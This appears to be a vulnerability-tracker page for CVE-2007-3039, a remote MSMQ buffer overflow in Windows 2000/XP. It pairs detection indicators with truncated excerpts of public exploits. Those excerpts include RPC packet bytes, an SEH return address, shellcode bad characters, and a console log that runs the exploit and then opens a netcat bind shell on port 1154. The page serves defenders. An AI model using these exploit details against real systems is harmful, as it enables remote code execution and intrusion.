CVE-2007-3039
published 2007-12-12CVE-2007-3039: Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP…
PriorityP267critical9CVSS 2.0
AVNACLAuSCCICAC
EXPLOIT
EPSS
69.06%
99.3th percentile
Stack-based buffer overflow in the Microsoft Message Queuing (MSMQ) service in Microsoft Windows 2000 Server SP4, Windows 2000 Professional SP4, and Windows XP SP2 allows attackers to execute arbitrary code via a long string in an opnum 0x06 RPC call to port 2103. NOTE: this is remotely exploitable on Windows 2000 Server.
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
05 00 0b 03 10 00 00 00 48 00 00 00 01 00 00 00 d0 16 d0 16 00 00 00 00 01 00 00 00 00 00 01 00 30 a0 b3 fd 5f 06 d1 11 bb 9b 00 a0 24 ea 55 25 01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
bytes↗
05 00 00 81 10 00 00 00 d0 16 00 00 01 00 00 00 98 17 00 00 00 00 06 00 30 a0 b3 fd 5f 06 d1 11 bb 9b 00 a0 24 ea 55 25 01 00 00 00 ba 0b 00 00 00 00 00 00 ba 0b 00 00
bytes↗
eb 06 42 42 (jmpcode / SEH overwrite)
- →Detect RPC bind requests to MSMQ interface UUID fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0 on TCP port 2103 (also 2105, 2107) followed by an opnum 0x06 call containing an oversized DNS name string (>310 bytes after unicode expansion). ↗
- →Look for the RPC bind packet byte signature starting with 05 00 0b 03 containing UUID bytes 30 a0 b3 fd 5f 06 d1 11 bb 9b 00 a0 24 ea 55 25 on MSMQ ports (2103/2105/2107). ↗
- →Flag outbound connections from MSMQ service host to port 1154 or 4444 post-exploitation, as these are the bind-shell ports used by the public exploit shellcodes. ↗
- →Detect the SEH overwrite pattern \xeb\x06\x42\x42 within RPC request payloads to MSMQ ports as an exploit-specific byte signature. ↗
- →The exploit requires a valid FQDN (DNS name) configured on the target; the RPC opnum 0x06 payload embeds this name in Unicode followed by a backslash (\x5c \x00) and then overflow padding. Monitor for anomalously large unicode strings in MSMQ RPC calls. ↗
- →The Metasploit module remaps scanning hits on ports 445/139 to 2103 for automated exploitation; correlate MSMQ vulnerability scanner traffic on 445/139 with follow-up exploit traffic on 2103. ↗
- ·Exploitation requires the target to have MSMQ installed and configured with a DNS (FQDN) name; the DNS name does not need to be resolvable by a real DNS server, only configured on the target machine. ↗
- ·The vulnerability is remotely exploitable only on Windows 2000 Server; Windows 2000 Professional and Windows XP SP2 are also affected but require local access. ↗
- ·The SEH overwrite return address 0x75022ac4 (ws2help.dll pop/pop/ret) is specific to Windows 2000 Server English; offsets and return addresses must be adjusted for other language versions. ↗
- ·Payload bad characters that must be avoided are \x00\x0a\x0d\x5c\x5f\x2f\x2e\xff; the backslash (\x5c) and underscore (\x5f) are bad chars, which constrains shellcode encoding. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)
exploitdb·2010-07-25
CVE-2007-3039 Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)
Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)
---
##
# $Id: ms07_065_msmq.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Message Queueing Service DNS Name Path Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the RPC interface
to the Microsoft Message Queueing service. This exploit requires
the target system to have been configured with a DNS name and
for that name to be supplied in the 'DNAME' option. This name does
not ne
Exploit-DB
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)
exploitdb·2008-01-18
CVE-2007-3039 Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)
---
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
Mod of axis's code.
CHANGELOG
- added dnsname as a parameter, before it was hardcoded in the
request data. (Marcin Kozlowski)
Provided for legal security research and testing purposes ONLY
Go through the code :)
*/
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0
char bind_str[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
0xbb, 0x9b, 0x00, 0xa0, 0x24,
Exploit-DB
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
exploitdb·2007-12-21·CVSS 9.0
CVE-2007-3039 [CRITICAL] Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)
---
********************** merry christmas Sysadmins *****************************
************** Microsoft Message Queue POC exploit ( MS07-065 ) **************
Mario Ballano - (mballano~gmail.com) - http://www.48bits.com
Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org
* Original Advisory:
http://www.zerodayinitiative.com/advisories/ZDI-07-076.html
* Microsoft Bulletin :
http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx
* CVE Code: CVE-2007-3039
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039
* Timeline:
No naked news this time, just rum and whiskey
* Additional information:
From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports fo
Exploit-DB
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)
exploitdb·2007-12-18
CVE-2007-3039 Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)
Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)
---
/*
Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)
by axis
http://www.ph4nt0m.org
you should know the dnsname of target to trigger this vuln
the service runs on port 2103/2105/2107
D:\soft\develop\MyProjects\temp\Debug>temp.exe -h 192.168.152.100 -p 2103
-== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==-
-== code by axis@ph4nt0m ==-
-== Http://www.ph4nt0m.org ==-
-== Tested against Windows 2000 server SP4 ==-
[+] Attacking default port 2103
[*]Sending our Payload, Good Luck! ^_^
[*]Sending RPC Bind String!
[*]Sending RPC Request Now!
D:\soft\develop\MyProjects\temp\Debug>
D:\>nc -vv -n 192.168.152.100 1154
(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown soc
Metasploit
MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow
metasploit
MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow
MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow
This module exploits a stack buffer overflow in the RPC interface to the Microsoft Message Queueing service. This exploit requires the target system to have been configured with a DNS name and for that name to be supplied in the 'DNAME' option. This name does not need to be served by a valid DNS server, only configured on the target machine.
No writeups or analysis indexed.
http://secunia.com/advisories/28011http://secunia.com/advisories/28051http://www.securityfocus.com/archive/1/484891/100/0/threadedhttp://www.securityfocus.com/archive/1/485268/100/0/threadedhttp://www.securityfocus.com/bid/26797http://www.securitytracker.com/id?1019077http://www.us-cert.gov/cas/techalerts/TA07-345A.htmlhttp://www.vupen.com/english/advisories/2007/4181http://www.zerodayinitiative.com/advisories/ZDI-07-076.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-065https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4474https://www.exploit-db.com/exploits/4745https://www.exploit-db.com/exploits/4760https://www.exploit-db.com/exploits/4934http://secunia.com/advisories/28011http://secunia.com/advisories/28051http://www.securityfocus.com/archive/1/484891/100/0/threadedhttp://www.securityfocus.com/archive/1/485268/100/0/threadedhttp://www.securityfocus.com/bid/26797http://www.securitytracker.com/id?1019077http://www.us-cert.gov/cas/techalerts/TA07-345A.htmlhttp://www.vupen.com/english/advisories/2007/4181http://www.zerodayinitiative.com/advisories/ZDI-07-076.htmlhttps://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-065https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A4474https://www.exploit-db.com/exploits/4745https://www.exploit-db.com/exploits/4760https://www.exploit-db.com/exploits/4934
2007-12-12
Published